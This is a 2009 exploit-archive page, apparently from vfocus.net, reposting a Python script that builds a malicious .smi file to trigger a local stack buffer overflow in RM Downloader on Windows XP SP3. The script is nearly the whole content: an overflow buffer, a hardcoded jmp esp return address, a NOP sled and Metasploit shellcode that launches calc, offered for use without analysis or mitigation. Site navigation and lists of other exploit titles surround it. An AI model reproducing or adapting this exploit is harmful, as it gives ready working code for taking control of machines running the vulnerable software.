首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RM Downloader (.smi File) Local Stack Overflow Exploit
来源:vfocus.net 作者:vfocus 发布时间:2009-05-04  
#usage: exploit.py
print "**************************************************************************"
print " RM Downloader (.smi) Local Stack Overflow\n"
print " Exploit code: ThE g0bL!N"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " greetz: His0k4 Dos-Dz TeaM-Snakes Team and all My friend\n"
print "**************************************************************************"
                     
buff = "\x41" * 26083
jump = "\x5D\x38\x82\x7C" # jmp esp kernel32.dll
nops = "\x90"*6

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4b"
"\x1d\xa3\xb6\x83\xeb\xfc\xe2\xf4\xb7\xf5\xe7\xb6\x4b\x1d\x28\xf3"
"\x77\x96\xdf\xb3\x33\x1c\x4c\x3d\x04\x05\x28\xe9\x6b\x1c\x48\xff"
"\xc0\x29\x28\xb7\xa5\x2c\x63\x2f\xe7\x99\x63\xc2\x4c\xdc\x69\xbb"
"\x4a\xdf\x48\x42\x70\x49\x87\xb2\x3e\xf8\x28\xe9\x6f\x1c\x48\xd0"
"\xc0\x11\xe8\x3d\x14\x01\xa2\x5d\xc0\x01\x28\xb7\xa0\x94\xff\x92"
"\x4f\xde\x92\x76\x2f\x96\xe3\x86\xce\xdd\xdb\xba\xc0\x5d\xaf\x3d"
"\x3b\x01\x0e\x3d\x23\x15\x48\xbf\xc0\x9d\x13\xb6\x4b\x1d\x28\xde"
"\x77\x42\x92\x40\x2b\x4b\x2a\x4e\xc8\xdd\xd8\xe6\x23\xed\x29\xb2"
"\x14\x75\x3b\x48\xc1\x13\xf4\x49\xac\x7e\xc2\xda\x28\x1d\xa3\xb6")


exploit = buff + jump + nops + shellcode

try:
    out_file = open("exploit.smi",'w')
    out_file.write(exploit+"\r\n")
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"

# [2009-05-01]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Beatport Player 1.0.0.283 (.M3
·Beatport Player 1.0.0.283 (.m3
·MiniTwitter 0.2b Remote User O
·Beatport Player 1.0.0.283 (.M3
·MiniTwitter 0.2b Multiple SQL
·Beatport Player 1.0.0.283 (.M3
·Golabi CMS <= 1.0.1 Session Po
·pecio cms 1.1.5 (index.php lan
·Addonics NAS Adapter FTP Remot
·RM Downloader (.smi File) Univ
·Mercury Audio Player 1.21 (.m3
·Mercury Audio Player 1.21 (.pl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved